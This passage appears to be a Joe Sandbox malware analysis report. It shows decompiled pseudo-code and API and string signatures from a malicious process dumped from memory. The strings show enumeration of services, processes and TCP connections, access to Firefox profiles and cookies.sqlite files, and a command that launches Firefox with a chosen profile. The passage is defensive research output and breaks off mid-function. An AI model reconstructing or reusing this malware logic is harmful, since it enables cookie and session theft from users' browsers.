                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				_t366 =  *((intOrPtr*)(_t542 + 0x50)) + 0x3e + _t536 + _t536;
                                                            				LocalSize(??);
                                                            				if (_t412 - _t536 >= 0) goto 0xaf5464e1;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				_t418 = _t412;
                                                            				 *(_t542 + 0x60) = _t412;
                                                            				_t537 =  *((intOrPtr*)(_t540 - 0x58));
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0( *((intOrPtr*)(_t542 + 0x50)), 0,  *((intOrPtr*)(_t542 + 0x50)) + 0x3e + _t536 + _t536, _t367,  *_t537 + _t418,  *_t537,  *((intOrPtr*)(_t540 - 0x78)), _t537, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0( *_t537 + _t412 * 2, 0,  *((intOrPtr*)(_t542 + 0x50)) + 0x3e + _t536 + _t536, _t367,  *((intOrPtr*)(_t537 + 8)) +  *(_t542 + 0x60),  *((intOrPtr*)(_t537 + 8)),  *((intOrPtr*)(_t540 - 0x78)), _t537, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0,  *((intOrPtr*)(_t542 + 0x50)) + 0x3e + _t536 + _t536, _t367,  *_t563 +  *(_t542 + 0x60),  *_t563,  *((intOrPtr*)(_t540 - 0x78)), _t537, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				_t513 =  *(_t542 + 0x60);
                                                            				asm("movups xmm0, [esi+0x10]");
                                                            				asm("movups [ebx+edx], xmm0");
                                                            				asm("movups xmm1, [esi+0x20]");
                                                            				asm("movups [ebx+edx+0x10], xmm1");
                                                            				_t538 = _t513;
                                                            				 *((intOrPtr*)(_t418 + _t513 + 0x20)) =  *((intOrPtr*)(_t537 + 0x30));
                                                            				 *((intOrPtr*)(_t418 + _t513)) =  *((intOrPtr*)(_t542 + 0x70));
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 0x2a, 0, _t366, _t367, 0xaf586058 + _t513, 0xaf586058, _t529, _t513, 2 + _t412 * 2);
                                                            				_t469 =  !=  ? _t430 : 0xaf586058;
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t540 + 0x1c0 + _t513, _t540 + 0x1c0, _t529, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, 0xaf586058 + _t538, 0xaf586058, _t529, _t538, 2 + _t412 * 2);
                                                            				_t475 =  !=  ? _t402 : 0xaf586058;
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t529 + _t538, _t529, _t529, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				_t530 =  *((intOrPtr*)(_t540 - 0x80));
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367,  *((intOrPtr*)(_t540 - 0x80)) + _t538,  *((intOrPtr*)(_t540 - 0x80)),  *((intOrPtr*)(_t540 - 0x80)), _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t540 + 0x3d0 + _t538, _t540 + 0x3d0, _t530, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t540 + 0x5e0 + _t538, _t540 + 0x5e0, _t530, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t418 + _t412 * 2 + 2, 0, _t366, _t367, _t540 + 0x7f0 + _t538, _t540 + 0x7f0, _t530, _t538, 2 + _t412 * 2);
                                                            				lstrlenW(??);
                                                            				r14d = _t418 + _t412 * 2;
                                                            				_t286 =  *((intOrPtr*)(_t542 + 0x74)) + 1;
                                                            				 *((intOrPtr*)(_t542 + 0x50)) = r14d;
                                                            				 *((intOrPtr*)(_t542 + 0x74)) = _t286;
                                                            				if (_t286 -  *((intOrPtr*)(_t542 + 0x54)) < 0) goto 0xaf5461b0;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				LocalFree(??);
                                                            				LocalFree(??);
                                                            				LocalFree(??);
                                                            				CloseServiceHandle(??);
                                                            				return E0000022B22BAF55A7C0(_t418 + _t412 * 2 + 2, _t412,  *(_t540 + 0xc10) ^ _t542);
                                                            			}


































                                                            0x22baf545fd0
                                                            0x22baf545fd5
                                                            0x22baf545fdd
                                                            0x22baf545fe4
                                                            0x22baf545feb
                                                            0x22baf545fee
                                                            0x22baf545ff5
                                                            0x22baf545ffc
                                                            0x22baf546001
                                                            0x22baf546007
                                                            0x22baf54600c
                                                            0x22baf546011
                                                            0x22baf546017
                                                            0x22baf546021
                                                            0x22baf546023
                                                            0x22baf54602d
                                                            0x22baf546032
                                                            0x22baf546032
                                                            0x22baf54603d
                                                            0x22baf546042
                                                            0x22baf546042
                                                            0x22baf546046
                                                            0x22baf54604e
                                                            0x22baf546053
                                                            0x22baf546058
                                                            0x22baf54605d
                                                            0x22baf546069
                                                            0x22baf54606e
                                                            0x22baf546076
                                                            0x22baf54607b
                                                            0x22baf54608b
                                                            0x22baf546095
                                                            0x22baf54609b
                                                            0x22baf54609f
                                                            0x22baf5460a8
                                                            0x22baf5460aa
                                                            0x22baf5460b2
                                                            0x22baf5460b7
                                                            0x22baf5460c1
                                                            0x22baf5460cd
                                                            0x22baf5460d2
                                                            0x22baf5460d7
                                                            0x22baf5460dc
                                                            0x22baf5460e1
                                                            0x22baf5460e5
                                                            0x22baf5460e5
                                                            0x22baf5460e9
                                                            0x22baf5460e9
                                                            0x22baf5460ed
                                                            0x22baf5460f2
                                                            0x22baf5460fa
                                                            0x22baf5460ff
                                                            0x22baf546108
                                                            0x22baf546110
                                                            0x22baf546115
                                                            0x22baf546122
                                                            0x22baf54612f
                                                            0x22baf546137
                                                            0x22baf54613d
                                                            0x22baf54614b
                                                            0x22baf546150
                                                            0x22baf546155
                                                            0x22baf54615c
                                                            0x22baf546167
                                                            0x22baf546170
                                                            0x22baf546173
                                                            0x22baf546182
                                                            0x22baf546188
                                                            0x22baf54618b
                                                            0x22baf546193
                                                            0x22baf54619c
                                                            0x22baf5461b0
                                                            0x22baf5461be
                                                            0x22baf5461c2
                                                            0x22baf5461c5
                                                            0x22baf5461c9
                                                            0x22baf5461cf
                                                            0x22baf5461da
                                                            0x22baf5461e1
                                                            0x22baf5461ed
                                                            0x22baf5461f8
                                                            0x22baf54620c
                                                            0x22baf54620e
                                                            0x22baf546220
                                                            0x22baf546227
                                                            0x22baf54622b
                                                            0x22baf546238
                                                            0x22baf54623c
                                                            0x22baf546243
                                                            0x22baf54624b
                                                            0x22baf546255
                                                            0x22baf546259
                                                            0x22baf546262
                                                            0x22baf54626b
                                                            0x22baf546278
                                                            0x22baf546283
                                                            0x22baf54628c
                                                            0x22baf546293
                                                            0x22baf5462a2
                                                            0x22baf5462a8
                                                            0x22baf5462b3
                                                            0x22baf5462b9
                                                            0x22baf5462cf
                                                            0x22baf5462d7
                                                            0x22baf5462df
                                                            0x22baf5462e9
                                                            0x22baf5462f5
                                                            0x22baf5462fb
                                                            0x22baf546300
                                                            0x22baf546303
                                                            0x22baf54631e
                                                            0x22baf54632a
                                                            0x22baf546337
                                                            0x22baf546341
                                                            0x22baf546346
                                                            0x22baf54635a
                                                            0x22baf54635d
                                                            0x22baf546363
                                                            0x22baf546365
                                                            0x22baf54636b
                                                            0x22baf54636d
                                                            0x22baf54637e
                                                            0x22baf54638b
                                                            0x22baf54638d
                                                            0x22baf546394
                                                            0x22baf54639e
                                                            0x22baf5463a1
                                                            0x22baf5463a7
                                                            0x22baf5463ad
                                                            0x22baf5463b3
                                                            0x22baf5463b5
                                                            0x22baf5463be
                                                            0x22baf5463c7
                                                            0x22baf5463c9
                                                            0x22baf5463cb
                                                            0x22baf5463d1
                                                            0x22baf5463d8
                                                            0x22baf5463da
                                                            0x22baf5463e3
                                                            0x22baf5463ec
                                                            0x22baf5463ee
                                                            0x22baf5463f0
                                                            0x22baf54640e
                                                            0x22baf54641e
                                                            0x22baf546429
                                                            0x22baf546434
                                                            0x22baf546440
                                                            0x22baf546446
                                                            0x22baf54644f
                                                            0x22baf54645a
                                                            0x22baf546465
                                                            0x22baf546474
                                                            0x22baf546483
                                                            0x22baf546492
                                                            0x22baf5464a1
                                                            0x22baf5464bb
                                                            0x22baf5464bd
                                                            0x22baf5464c6
                                                            0x22baf5464c8
                                                            0x22baf5464d3
                                                            0x22baf5464d9
                                                            0x22baf5464dc
                                                            0x22baf5464e1
                                                            0x22baf5464e8
                                                            0x22baf546502
                                                            0x22baf54650a
                                                            0x22baf54651e
                                                            0x22baf546539
                                                            0x22baf546542
                                                            0x22baf546552
                                                            0x22baf54656d
                                                            0x22baf546576
                                                            0x22baf54657c
                                                            0x22baf546581
                                                            0x22baf54658f
                                                            0x22baf546593
                                                            0x22baf546597
                                                            0x22baf54659f
                                                            0x22baf5465a2
                                                            0x22baf5465a9
                                                            0x22baf5465b2
                                                            0x22baf5465ca
                                                            0x22baf5465cf
                                                            0x22baf5465d2
                                                            0x22baf5465e5
                                                            0x22baf546601
                                                            0x22baf54660d
                                                            0x22baf54661c
                                                            0x22baf546634
                                                            0x22baf546639
                                                            0x22baf54663c
                                                            0x22baf54664b
                                                            0x22baf546663
                                                            0x22baf54666b
                                                            0x22baf546671
                                                            0x22baf54667e
                                                            0x22baf546696
                                                            0x22baf54669e
                                                            0x22baf5466b1
                                                            0x22baf5466cd
                                                            0x22baf5466d9
                                                            0x22baf5466ec
                                                            0x22baf546708
                                                            0x22baf546714
                                                            0x22baf546727
                                                            0x22baf546743
                                                            0x22baf54674f
                                                            0x22baf546763
                                                            0x22baf54676f
                                                            0x22baf546771
                                                            0x22baf546776
                                                            0x22baf54677e
                                                            0x22baf546787
                                                            0x22baf546790
                                                            0x22baf54679c
                                                            0x22baf5467a5
                                                            0x22baf5467ae
                                                            0x22baf5467b8
                                                            0x22baf546803

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$Local$AllocCloseHandle$EnumOpenQueryServicesStatus$ConfigConfig2FreeManagerwsprintf
                                                            • String ID: SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                            • API String ID: 3781266245-2144606380
                                                            • Opcode ID: 9d6868b7212e53bdaed3ab9efab12b3820a6fc241d769bc0c4cbb1eb04b2dbc9
                                                            • Instruction ID: 7210e50ad068ed2b987311fea38c339920aff62f73fe4172409d7754d19d81a2
                                                            • Opcode Fuzzy Hash: 9d6868b7212e53bdaed3ab9efab12b3820a6fc241d769bc0c4cbb1eb04b2dbc9
                                                            • Instruction Fuzzy Hash: 06327133600B95A6EF21DFA5E85C3DE73A1FB88B85F410425DA4A47B6AEF39D509C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 59%
                                                            			E0000022B22BAF548150(void* __ebx, void* __esi, long long __rbx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
                                                            				void* __rbp;
                                                            				void* __r12;
                                                            				void* __r15;
                                                            				signed int _t137;
                                                            				int _t146;
                                                            				int _t147;
                                                            				int _t148;
                                                            				int _t188;
                                                            				void* _t210;
                                                            				signed char _t214;
                                                            				void* _t235;
                                                            				void* _t241;
                                                            				signed long long _t265;
                                                            				signed long long _t266;
                                                            				intOrPtr _t267;
                                                            				void* _t268;
                                                            				signed long long _t270;
                                                            				intOrPtr _t271;
                                                            				void* _t272;
                                                            				intOrPtr _t274;
                                                            				signed int _t278;
                                                            				intOrPtr _t296;
                                                            				void* _t297;
                                                            				signed char _t330;
                                                            				void* _t331;
                                                            				long _t359;
                                                            				void* _t360;
                                                            				void* _t362;
                                                            				signed long long _t363;
                                                            				int _t378;
                                                            				long _t381;
                                                            				void* _t383;
                                                            				int _t386;
                                                            				signed long long _t387;
                                                            				signed long long _t388;
                                                            
                                                            				_t365 = __r8;
                                                            				_t357 = __rsi;
                                                            				_t353 = __rdi;
                                                            				 *((long long*)(_t362 + 8)) = __rbx;
                                                            				 *((long long*)(_t362 + 0x10)) = __rsi;
                                                            				 *((long long*)(_t362 + 0x18)) = __rdi;
                                                            				_t360 = _t362 - 0xc10;
                                                            				_t363 = _t362 - 0xd10;
                                                            				_t265 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t266 = _t265 ^ _t363;
                                                            				 *(_t360 + 0xc00) = _t266;
                                                            				r8d = 0x238;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t363 + 0x30, __rdx, __rdi, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x1b0, __rdx, _t353, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x3c0, __rdx, _t353, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x5d0, __rdx, _t353, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x7e0, __rdx, _t353, __r8);
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t210, 0, _t235, _t241, _t360 + 0x9f0, __rdx, _t353, _t365);
                                                            				 *((long long*)(_t360 + 0x188)) = 7;
                                                            				r12d = 0;
                                                            				 *(_t360 + 0x180) = _t378;
                                                            				 *(_t360 + 0x170) = r12w;
                                                            				__imp__CreateToolhelp32Snapshot();
                                                            				 *(_t363 + 0x28) = _t266;
                                                            				if (_t266 == 0xffffffff) goto 0xaf548667;
                                                            				 *(_t363 + 0x30) = 0x238;
                                                            				LocalAlloc(_t386);
                                                            				_t387 = _t266;
                                                            				_t20 = _t378 + 1; // 0x1
                                                            				r13d = _t20;
                                                            				 *_t266 = 0x80;
                                                            				if (Process32FirstW(_t383) == 0) goto 0xaf548649;
                                                            				r8d =  *(_t363 + 0x38);
                                                            				OpenProcess(_t381, _t378, _t359);
                                                            				_t137 =  *(_t363 + 0x38);
                                                            				if ((_t137 & 0xfffffff3) != 0) goto 0xaf5482a9;
                                                            				if (_t137 != 0xc) goto 0xaf54862a;
                                                            				E0000022B22BAF547A60(_t266, _t360 + 0x1b0, 0xffffffff, __rsi, _t360, _t378, _t387);
                                                            				E0000022B22BAF5495D0(_t360 + 0x1b0, _t360 + 0x5d0, _t360, _t360 + 0x7e0, _t360 + 0x9f0, _t378);
                                                            				E0000022B22BAF5478C0(_t266, _t266, _t360 + 0x3c0);
                                                            				 *((intOrPtr*)(_t363 + 0x24)) = r12d;
                                                            				LoadLibraryA(??);
                                                            				GetProcAddress(??, ??);
                                                            				if (_t266 == 0) goto 0xaf548319;
                                                            				 *_t266();
                                                            				_t214 =  *(_t363 + 0x38);
                                                            				 *((intOrPtr*)(_t363 + 0x20)) = r12d;
                                                            				__imp__ProcessIdToSessionId();
                                                            				E0000022B22BAF536CE0( *(_t363 + 0x38), _t360 + 0x190, _t357, _t360 + 0x9f0);
                                                            				E0000022B22BAF5489C0(_t214, _t266, _t360 + 0x170, _t266, _t357);
                                                            				_t267 =  *((intOrPtr*)(_t360 + 0x1a8));
                                                            				if (_t267 - 8 < 0) goto 0xaf5483ac;
                                                            				_t296 =  *((intOrPtr*)(_t360 + 0x190));
                                                            				_t268 = _t267 + 1;
                                                            				if (_t268 - 0xffffffff > 0) goto 0xaf548708;
                                                            				if (_t268 + _t268 - 0x1000 < 0) goto 0xaf5483a7;
                                                            				if ((_t214 & 0x0000001f) != 0) goto 0xaf548702;
                                                            				_t270 =  *((intOrPtr*)(_t296 - 8));
                                                            				if (_t270 - _t296 >= 0) goto 0xaf5486fc;
                                                            				_t297 = _t296 - _t270;
                                                            				if (_t297 - 8 < 0) goto 0xaf5486f6;
                                                            				if (_t297 - 0x27 > 0) goto 0xaf5486f0;
                                                            				0xaf55a85c();
                                                            				_t278 =  *(_t360 + 0x180);
                                                            				_t146 = lstrlenW(??);
                                                            				_t147 = lstrlenW(??);
                                                            				_t148 = lstrlenW(??);
                                                            				_t240 = _t146 + _t147 + _t148 + lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				LocalSize(??);
                                                            				if (_t270 - _t278 >= 0) goto 0xaf548439;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				_t388 = _t270;
                                                            				r13d = r13d + 4;
                                                            				 *(_t387 + _t388) =  *(_t363 + 0x38);
                                                            				 *((intOrPtr*)(_t381 + _t388)) =  *((intOrPtr*)(_t363 + 0x50));
                                                            				r13d = r13d + 4;
                                                            				 *((intOrPtr*)(_t381 + _t388)) =  *((intOrPtr*)(_t363 + 0x4c));
                                                            				r13d = r13d + 4;
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(r13d, _t235, _t146 + _t147 + _t148 + lstrlenW(??), _t241, _t363 + 0x5c + _t388, _t363 + 0x5c, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t270 * 2 + r13d, _t235, _t146 + _t147 + _t148 + lstrlenW(??), _t241, _t360 + 0x1b0 + _t388, _t360 + 0x1b0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				_t347 =  >=  ?  *(_t360 + 0x170) : _t360 + 0x170;
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 2, _t235, _t146 + _t147 + _t148 + lstrlenW(??), _t241, _t360 + 0x1b0 + _t388,  >=  ?  *(_t360 + 0x170) : _t360 + 0x170, 0xffffffff, _t357, 2 +  *(_t360 + 0x180) * 2);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 2, _t235, _t146 + _t147 + _t148 + lstrlenW(??), _t241, _t360 + 0x3c0 + _t388, _t360 + 0x3c0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				 *((intOrPtr*)(_t278 + _t388)) =  *((intOrPtr*)(_t363 + 0x20));
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 6, _t235, _t240, _t241, _t360 + 0x5d0 + _t388, _t360 + 0x5d0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 2, _t235, _t240, _t241, _t360 + 0x7e0 + _t388, _t360 + 0x7e0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				lstrlenW(??);
                                                            				E0000022B22BAF562BA0(_t278 + _t270 * 2 + 2, _t235, _t240, _t241, _t360 + 0x9f0 + _t388, _t360 + 0x9f0, 0xffffffff, _t357, 2 + _t270 * 2);
                                                            				lstrlenW(??);
                                                            				r13d = _t278 + _t270 * 2;
                                                            				 *((intOrPtr*)(_t381 + _t388)) =  *((intOrPtr*)(_t363 + 0x24));
                                                            				r13d = r13d + 4;
                                                            				_t188 = CloseHandle(??);
                                                            				__imp__Process32NextW();
                                                            				if (_t188 != 0) goto 0xaf548280;
                                                            				r8d = 0x42;
                                                            				LocalReAlloc(??, ??, ??);
                                                            				CloseHandle(??);
                                                            				_t271 =  *((intOrPtr*)(_t360 + 0x188));
                                                            				if (_t271 - 8 < 0) goto 0xaf5486b7;
                                                            				_t330 =  *(_t360 + 0x170);
                                                            				_t272 = _t271 + 1;
                                                            				if (_t272 - 0xffffffff > 0) goto 0xaf5486ea;
                                                            				if (_t272 + _t272 - 0x1000 < 0) goto 0xaf5486b2;
                                                            				if (( *(_t360 + 0x170) & 0x0000001f) != 0) goto 0xaf54870e;
                                                            				_t274 =  *((intOrPtr*)(_t330 - 8));
                                                            				if (_t274 - _t330 >= 0) goto 0xaf548714;
                                                            				_t331 = _t330 - _t274;
                                                            				if (_t331 - 8 < 0) goto 0xaf54871a;
                                                            				if (_t331 - 0x27 > 0) goto 0xaf548720;
                                                            				0xaf55a85c();
                                                            				return E0000022B22BAF55A7C0(_t278 + _t270 * 2 + 2, _t270,  *(_t360 + 0xc00) ^ _t363);
                                                            			}






































                                                            0x22baf548150
                                                            0x22baf548150
                                                            0x22baf548150
                                                            0x22baf548150
                                                            0x22baf548155
                                                            0x22baf54815a
                                                            0x22baf548168
                                                            0x22baf548170
                                                            0x22baf548177
                                                            0x22baf54817e
                                                            0x22baf548181
                                                            0x22baf54818f
                                                            0x22baf548195
                                                            0x22baf5481a3
                                                            0x22baf5481a9
                                                            0x22baf5481b7
                                                            0x22baf5481bd
                                                            0x22baf5481cb
                                                            0x22baf5481d1
                                                            0x22baf5481df
                                                            0x22baf5481e5
                                                            0x22baf5481f3
                                                            0x22baf5481f9
                                                            0x22baf548200
                                                            0x22baf54820b
                                                            0x22baf54820e
                                                            0x22baf548215
                                                            0x22baf548220
                                                            0x22baf548226
                                                            0x22baf54823c
                                                            0x22baf548247
                                                            0x22baf548254
                                                            0x22baf548262
                                                            0x22baf548265
                                                            0x22baf548265
                                                            0x22baf54826a
                                                            0x22baf548275
                                                            0x22baf548280
                                                            0x22baf54828c
                                                            0x22baf548295
                                                            0x22baf54829e
                                                            0x22baf5482a3
                                                            0x22baf5482b3
                                                            0x22baf5482d4
                                                            0x22baf5482e3
                                                            0x22baf5482ef
                                                            0x22baf5482f4
                                                            0x22baf548304
                                                            0x22baf54830d
                                                            0x22baf548317
                                                            0x22baf548319
                                                            0x22baf548322
                                                            0x22baf548327
                                                            0x22baf548338
                                                            0x22baf548347
                                                            0x22baf54834c
                                                            0x22baf548357
                                                            0x22baf548359
                                                            0x22baf548360
                                                            0x22baf548366
                                                            0x22baf548375
                                                            0x22baf54837a
                                                            0x22baf548380
                                                            0x22baf548387
                                                            0x22baf54838d
                                                            0x22baf548394
                                                            0x22baf54839e
                                                            0x22baf5483a7
                                                            0x22baf5483ac
                                                            0x22baf5483b8
                                                            0x22baf5483c7
                                                            0x22baf5483d6
                                                            0x22baf5483f2
                                                            0x22baf5483f4
                                                            0x22baf548403
                                                            0x22baf54841a
                                                            0x22baf548423
                                                            0x22baf548425
                                                            0x22baf548430
                                                            0x22baf548436
                                                            0x22baf548440
                                                            0x22baf548444
                                                            0x22baf548451
                                                            0x22baf548456
                                                            0x22baf54845e
                                                            0x22baf548463
                                                            0x22baf548467
                                                            0x22baf548482
                                                            0x22baf54848c
                                                            0x22baf5484a6
                                                            0x22baf5484c2
                                                            0x22baf5484ce
                                                            0x22baf5484fa
                                                            0x22baf548505
                                                            0x22baf54851d
                                                            0x22baf548539
                                                            0x22baf548545
                                                            0x22baf54855c
                                                            0x22baf548563
                                                            0x22baf54857f
                                                            0x22baf54858b
                                                            0x22baf54859e
                                                            0x22baf5485ba
                                                            0x22baf5485c6
                                                            0x22baf5485d9
                                                            0x22baf5485f5
                                                            0x22baf548601
                                                            0x22baf548614
                                                            0x22baf548621
                                                            0x22baf548626
                                                            0x22baf54862d
                                                            0x22baf54863b
                                                            0x22baf548643
                                                            0x22baf54864c
                                                            0x22baf548655
                                                            0x22baf548661
                                                            0x22baf548667
                                                            0x22baf548672
                                                            0x22baf548674
                                                            0x22baf54867b
                                                            0x22baf548681
                                                            0x22baf54868c
                                                            0x22baf548695
                                                            0x22baf548697
                                                            0x22baf54869e
                                                            0x22baf5486a0
                                                            0x22baf5486a7
                                                            0x22baf5486ad
                                                            0x22baf5486b2
                                                            0x22baf5486e9

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrlen$_invalid_parameter_noinfo_noreturn$Local$Alloc$ProcessWindow$CloseHandleProcess32Size$AddressCreateFirstLibraryLoadNextOpenProcSessionSnapshotTextThreadToolhelp32Visible
                                                            • String ID: IsWow64Process$kernel32.dll
                                                            • API String ID: 535452645-3024904723
                                                            • Opcode ID: 865c3783c3390c4822a7b71a95ef26ab696b4c125f10d315e7a9f238e33b693b
                                                            • Instruction ID: 1cdcc23a023fed7d043ebc8dcd034d53a1c12f6558e95e491c46d85dbcdaafb7
                                                            • Opcode Fuzzy Hash: 865c3783c3390c4822a7b71a95ef26ab696b4c125f10d315e7a9f238e33b693b
                                                            • Instruction Fuzzy Hash: 5D02C533610685A6EF36EFA4E85C3DE33A1F788789F444911DA5A4779AEF3AC205C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Alloclstrlen$Heap$Process$AddressFreeProcSize$LibraryLoad
                                                            • String ID: AllocateAndGetTcpExTableFromStack$GetExtendedTcpTable$iphlpapi.dll
                                                            • API String ID: 2855280697-4277049092
                                                            • Opcode ID: 7601e0a4b459352a92939cf667a52717564284ce3238fef11a6e4437f7e2914d
                                                            • Instruction ID: cfc59417cf914dfaed5f3172fcc9234655bbc4515034c08987778f523f03dbe5
                                                            • Opcode Fuzzy Hash: 7601e0a4b459352a92939cf667a52717564284ce3238fef11a6e4437f7e2914d
                                                            • Instruction Fuzzy Hash: B8E1A273615B84A6EB26DF99E85C3DA73B1FB88B80F004515DA4A4375AEF3AD449CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FromPointWindow$Message$ChildClientPostScreen$Send
                                                            • String ID: #32768$,$Button
                                                            • API String ID: 2316350196-3823977346
                                                            • Opcode ID: 6165075785d07e49daa80f41fcb39a2dff1203b85361a4e016a5dae74bccd009
                                                            • Instruction ID: e75bb4bdd4fc6ad01eaa5aa47c155746b7627d58347cb883d936f9e4d1599b88
                                                            • Opcode Fuzzy Hash: 6165075785d07e49daa80f41fcb39a2dff1203b85361a4e016a5dae74bccd009
                                                            • Instruction Fuzzy Hash: 21A1C537311A50A6FB798BA9E81C7DA73A0F785BA9F041611DD5A07F9ADF3EC4058700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileFindwsprintf$lstrcmp$Directorylstrcpy$AllocateCheckCloseCreateErrorFirstFreeInitializeLastMembershipNextToken$AddressEnvironmentExistsHandleLibraryLoadPathProcProfileUserVariable
                                                            • String ID: %s%s$%s\%s$%s\Profiles\%s$%s\Profiles\%s\cookies.sqlite$USERPROFILE$WTSQueryUserToken$Wtsapi32.dll$\AppData\Roaming\Mozilla\Firefox$\Profiles\*.*$cmd.exe /c start firefox.exe -no-remote -profile "%s"
                                                            • API String ID: 2343920944-4059221782
                                                            • Opcode ID: 93ac44abe063b4776f5dbfbf8dba5039e1362179fbac851d59ba965d3e510170
                                                            • Instruction ID: fbd7a9c1195f29244e59e4cd81c89808c281943e4ef25f493dc4683d5991f7f9
                                                            • Opcode Fuzzy Hash: 93ac44abe063b4776f5dbfbf8dba5039e1362179fbac851d59ba965d3e510170
                                                            • Instruction Fuzzy Hash: 1F611D33604A8AB5EF32DFA5E85C7D973A0F744788F400512D61E4766AEF7AC609C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 43%
                                                            			E0000022B22BAF535E30(signed long long __rbx, long long __rcx, intOrPtr* __rdx) {
                                                            				void* __rdi;
                                                            				void* __rsi;
                                                            				void* __rbp;
                                                            				signed int _t88;
                                                            				signed int _t98;
                                                            				void* _t108;
                                                            				signed char _t109;
                                                            				void* _t111;
                                                            				void* _t112;
                                                            				void* _t115;
                                                            				void* _t117;
                                                            				signed long long _t141;
